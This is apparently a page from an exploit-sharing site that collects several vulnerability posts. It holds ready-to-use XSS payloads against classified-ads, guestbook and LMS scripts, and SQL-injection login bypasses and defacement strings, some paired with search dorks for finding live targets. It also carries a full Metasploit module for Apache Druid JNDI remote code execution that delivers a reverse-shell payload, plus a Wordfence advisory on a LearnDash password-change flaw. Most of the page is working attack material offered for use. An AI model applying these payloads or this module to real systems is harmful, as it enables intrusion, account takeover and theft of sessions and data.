Latest exploits :: CodePwn

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://simplephpscripts.com/classified-ads-script-php/ │ │ Vendor : SimplePHPscripts │ │ Software : Classified Ads Script 1.8 │ │ Vuln Type: Reflected XSS - Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ Reflected XSS │ │ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ │ │ │ Stored XSS │ │ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /preview.php GET 'p' parameter is vulnerable to RXSS https://website/preview.php?id=14&cat_id=0&p=reioh%22%3e%3cscript%3ealert(1)%3c%2fscript%3eiv1mz&search= Path: / URL parameter is vulnerable to RXSS https://website/preview.php/x5t6p"><script>alert(1)</script>w5omd?id=14&cat_id=0&p=&search= ## Stored XSS ----------------------------------------------- POST /classified-ads-script-php/classifiedscript/user.php HTTP/2 Content-Disposition: form-data; name="title" <script>alert(1)</script> ----------------------------------------------- POST parameter 'title' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Normal User] Click on [Create Classified Ad] to create a [New Ads] on this Path (https://website/user.php?act=newAds) 2. Inject your [XSS Payload] in "Enter Title" 3. Save 4. XSS Fired on Local User Browser 5. When ADMIN check [Classified Ads Entry List] in Administration Panel to check [Waiting Approval Ads] on this Path (https://website/admin.php?act=ads) 6. XSS Will Fire and Executed on his Browser [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://simplephpscripts.com/guestbook-script-php/ │ │ Vendor : SimplePHPscripts │ │ Software : GuestBook Script 2.2 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: / URL parameter is vulnerable to RXSS https://website/preview.php/mmkpe"><script>alert(1)</script>zqufc?act=new Path: /preview.php GET 'SysMessage' parameter is vulnerable to RXSS https://website/preview.php?SysMessage=1krvxb%3cscript%3ealert(1)%3c%2fscript%3elxq6x [-] Done </code></pre>

<pre><code>==================================================================================================================================== | # Title : Alumni Club Management Tools v 2.2.7 auth by pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | | # Vendor : http://alumnimagnet.com | | # Dork : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload user : 'or''='@gmail.com pass : 'or''=' [+] https://127.0.0.1/edu/admin.html ====Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | =========================================================================================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : ALTISA CMS 5.2.1 Auth by pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : http://altisadz.com/ | | # Dork : Projet de gestion de SUPPLY CHAIN | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : User & Pass : ADMIN' OR 1=1# [+] Panel http://127.0.0.1/altisadzcom/admin ====Greetings to :======================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | ========================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Advanced Testimonials Manager v4.1.1 Auth by pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : https://codecanyon.net/item/advanced-testimonials-manager/113257?s_rank=194 | | # Dork : Advanced Testimonial Manager | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : user & pass = ' or 1=1 limit 1 -- -+ [+] http://127.0.0.1/www/lizaspartyrentalcom/testimonials/admin/index.php ====Greetings to :======================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | ========================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Advanced Php Url Shortener v 1.0 Xss Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : http://www.dl.persianscript.ir/script/advanced-php-url-shortener(PersianScript.ir).rar | | # Dork : | ==================================================================================================================================== P0C : [+] Dorking İn Google Or Other Search Enggine . [+] HTML Inject : [+] use payload : =%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E [+] http://127.0.0.1/social.pricopinfo/index.php?a=discover&u=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E XSS : [+] use payload : index.php?a=discover&u=skylargrey%3Cvideo%3E%3Csource%20onerror%3d%22javascript:prompt%28966118%29%22%3E [+] http://127.0.0.4/social.pricopinfo//index.php?a=discover&u=skylargrey%3Cvideo%3E%3Csource%20onerror%3d%22javascript:prompt%28966118%29%22%3E ====Greetings to :======================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | ========================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Active Matrimonial CMS v 1.6 HTML inject Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : https://activeitzone.com/demo/matrimonial_v1.6/ | | # Dork : "Active Matrimonial CMS - All Rights Reserved " | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Register new member . [+] go to edit your profil https://127.0.0.1/activeitzonecom/demo/matrimonial_v1.6/home/profile [+] in Introduction box , put your code or use this code for test : <marquee>Hacked by indoushka</marquee> </tr> <td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a> </tr> Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh | ======================================================================================================================================= </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://codecanyon.net/user/rocketsoft │ │ Vendor : RocketSoft │ │ Software : Rocket LMS 1.7 │ │ Vuln Type: Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ## Stored XSS ------------------------------------------------------------ POST /contact/store HTTP/1.1 _token=iytfhBpLDYy2flCFdMGcnYGIyvONBDgK60DdwAtn&name=[XSS Payload]&email=cracker@infosec.com&phone=96171951951&subject=[XSS Payload]&message=[XSS Payload]&captcha=32499 ------------------------------------------------------------ POST parameter 'name' is vulnerable to XSS POST parameter 'subject' is vulnerable to XSS POST parameter 'message' is vulnerable to XSS ## Steps to Reproduce: 1. Login (as Student) "Normal User" 2. Click On [Contact US] on this Path (https://website/contact) 3. Inject your [XSS Payload] in "Your name" 4. Inject your [XSS Payload] in "Subject" 5. Inject your [XSS Payload] in "Message Box" 6. Click on [Send Message] 5. When ADMIN Visit the [Notifications] - [History] in administration Panel to Check new messages on this Path (https://website/admin/notifications) & Click on [Show] 6. XSS will Fire & Executed on his Browser [-] Done </code></pre>

<pre><code>Description: LearnDash LMS <= 4.6.0 – Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary User Password Change Affected Plugin: LearnDash LMS Plugin Slug: sfwd-lms Affected Versions: <= 4.6.0 CVE ID: CVE-2023-3105 CVSS Score: 8.8 (High) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Researcher/s: Lana Codes Fully Patched Version: 4.6.0.1 The LearnDash LMS plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 4.6.0. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for attackers with existing account access at any level, to change user passwords and potentially take over administrator accounts. Technical Analysis The LearnDash LMS plugin provides the shortcode ‘[ld_reset_password]‘ to embed a password reset form into a page on a WordPress site. The form allows users to submit their username or email address to receive an email with a password reset link containing a user activation key. Examining the code reveals that the plugin checks that the user activation key belongs to the given user with the learndash_reset_password_verification() function only when displaying the new password form, where the new password can be entered. [View this code snippet on the blog] However, there is no user activation key check when processing this form. This makes it possible for any authenticated user who has accessed the password reset form via the link sent in the email to modify the password of another user by changing the value of the username hidden input field. [View this code snippet on the blog] As with any Arbitrary User Password Change that leads to a Privilege Escalation vulnerability, this can be used for complete site compromise. Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would. This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors, and modifying posts and pages which can be leveraged to redirect site users to other malicious sites. Disclosure Timeline June 5, 2023 – Discovery of the Arbitrary User Password Change vulnerability in LearnDash LMS. June 5, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion. June 5, 2023 – The vendor confirms the inbox for handling the discussion. June 5, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix. June 5, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. June 6, 2023 – A fully patched version of the plugin, 4.6.0.1, is released. July 5, 2023 – Wordfence Free users receive the same protection. Conclusion In this blog post, we have detailed an Arbitrary User Password Change vulnerability within the LearnDash LMS plugin affecting versions 4.6.0 and earlier. This vulnerability allows threat actors to easily take over websites by resetting the password of any user, including administrators. The vulnerability has been fully addressed in version 4.6.0.1 of the plugin. We encourage WordPress users to verify that their sites are updated to the latest patched version of LearnDash LMS. Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on June 5, 2023. Sites still using the free version of Wordfence will receive the same protection on July 5, 2023. If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk. For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard. </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Retry include Msf::Exploit::Remote::JndiInjection include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(_info = {}) super( 'Name' => 'Apache Druid JNDI Injection RCE', 'Description' => %q{ This module is designed to exploit the JNDI injection vulnerability in Druid. The vulnerability specifically affects the indexer/v1/sampler interface of Druid, enabling an attacker to execute arbitrary commands on the targeted server. The vulnerability is found in Apache Kafka clients versions ranging from 2.3.0 to 3.3.2. If an attacker can manipulate the sasl.jaas.config property of any of the connector's Kafka clients to com.sun.security.auth.module.JndiLoginModule, it allows the server to establish a connection with the attacker's LDAP server and deserialize the LDAP response. This provides the attacker with the capability to execute java deserialization gadget chains on the Kafka connect server, potentially leading to unrestricted deserialization of untrusted data or even remote code execution (RCE) if there are relevant gadgets in the classpath. To facilitate the exploitation process, this module will initiate an LDAP server that the target server needs to connect to in order to carry out the attack. }, 'Author' => [ 'RedWay Security <info[at]redwaysecurity.com>', # Metasploit module 'Jari Jääskelä <https://github.com/jarijaas>' # discovery ], 'References' => [ [ 'CVE', '2023-25194' ], [ 'URL', 'https://hackerone.com/reports/1529790'], [ 'URL', 'https://lists.apache.org/thread/vy1c7fqcdqvq5grcqp6q5jyyb302khyz' ] ], 'DisclosureDate' => '2023-02-07', 'License' => MSF_LICENSE, 'DefaultOptions' => { 'RPORT' => 8888, 'SSL' => true, 'SRVPORT' => 3389, 'WfsDelay' => 30 }, 'Targets' => [ [ 'Windows', { 'Platform' => 'win' }, ], [ 'Linux', { 'Platform' => 'unix', 'Arch' => [ARCH_CMD], 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/python/meterpreter_reverse_tcp' } }, ] ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [IOC_IN_LOGS], 'Reliability' => [REPEATABLE_SESSION] } ) register_options([ OptString.new('TARGETURI', [ true, 'Base path', '/']) ]) end def check validate_configuration! vprint_status('Attempting to trigger the jndi callback...') start_service res = trigger return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil? retry_until_truthy(timeout: datastore['WfsDelay']) { @search_received } return Exploit::CheckCode::Unknown('No LDAP search query was received.') unless @search_received report_vuln({ host: rhost, port: rport, name: name.to_s, refs: references, info: "Module #{fullname} found vulnerable host." }) Exploit::CheckCode::Vulnerable ensure cleanup_service end def build_ldap_search_response_payload return [] if @search_received @search_received = true return [] unless @exploiting print_good('Delivering the serialized Java object to execute the payload...') build_ldap_search_response_payload_inline('CommonsBeanutils1') end def trigger data = { type: 'kafka', spec: { type: 'kafka', ioConfig: { type: 'kafka', consumerProperties: { "bootstrap.servers": "#{Faker::Internet.ip_v4_address}:#{Faker::Number.number(digits: 4)}", "sasl.mechanism": 'SCRAM-SHA-256', "security.protocol": 'SASL_SSL', "sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"#{jndi_string}\" useFirstPass=\"true\" serviceName=\"#{Rex::Text.rand_text_alphanumeric(5)}\" debug=\"true\" group.provider.url=\"#{Rex::Text.rand_text_alphanumeric(5)}\";" }, topic: Rex::Text.rand_text_alpha(8..12).to_s, useEarliestOffset: true, inputFormat: { type: 'regex', pattern: '([\\s\\S]*)', listDelimiter: (SecureRandom.uuid.gsub('-', '')[0..20]).to_s, columns: ['raw'] } }, dataSchema: { dataSource: Rex::Text.rand_text_alphanumeric(5..10).to_s, timestampSpec: { column: Rex::Text.rand_text_alphanumeric(5..10).to_s, missingValue: DateTime.now.utc.iso8601.to_s }, dimensionsSpec: {}, granularitySpec: { rollup: false } }, tuningConfig: { type: 'kafka' } }, samplerConfig: { numRows: 500, timeoutMs: 15000 } } @search_received = false send_request_cgi( 'uri' => normalize_uri(target_uri, '/druid/indexer/v1/sampler') + '?for=connect', 'method' => 'POST', 'ctype' => 'application/json', 'data' => data.to_json ) end def exploit validate_configuration! @exploiting = true start_service res = trigger fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil? fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') unless res.code == 400 retry_until_truthy(timeout: datastore['WfsDelay']) { @search_received && (!handler_enabled? || session_created?) } handler ensure cleanup end end </code></pre>